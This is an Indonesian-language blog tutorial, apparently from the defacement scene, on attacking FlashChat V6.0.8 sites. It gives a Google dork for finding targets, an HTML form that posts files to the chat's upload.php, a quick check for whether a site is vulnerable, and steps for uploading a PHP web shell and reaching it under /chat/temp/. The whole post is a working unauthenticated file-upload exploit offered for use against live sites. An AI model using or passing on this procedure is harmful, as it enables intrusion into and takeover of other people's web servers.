Gak usah banyak cingcong dah langsung aja ke tutorialnya :D
Bahan :
- Dork : intitle:FlashChat V6.0.8
- CSRF :
<form action="http://site.co.li/chat/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
- Masukan Dork di atas ke mesin pencarian atau Google dan cari target yang masih perawan
- Ubah flashchat.php menjadi upload.php
Contoh : http://site.co.li/chat/flashchat.php Menjadi http://site.co.li/chat/upload.php . - Jika sitenya Vuln akan muncul tulisan OK dan sebaliknya jika tidak vuln akan menemukan 404 :V
- Lalu Kalian Masukan dah Sitenya di CSRF dan save
- Buka File CSRFnya lalu kalian Upload Shell atau File lainnya terserah kau saja :D
- Lalu klik upload. Jika Upload Sukses akan ada tulisan OK lagi
- lalu kalian masuk ke shellnya
Shell Acces : http://site.co.li/chat/temp/namashell.php - Sukses :D
: Format Shell .php
Thanks For Namaku Raden
Thanks For SuzukaAkatsuki
Mungkin sampe disini aja tutorialnya :D Semoga bermanfaat buat kalian :D
See You Next Time
No comments:
Post a Comment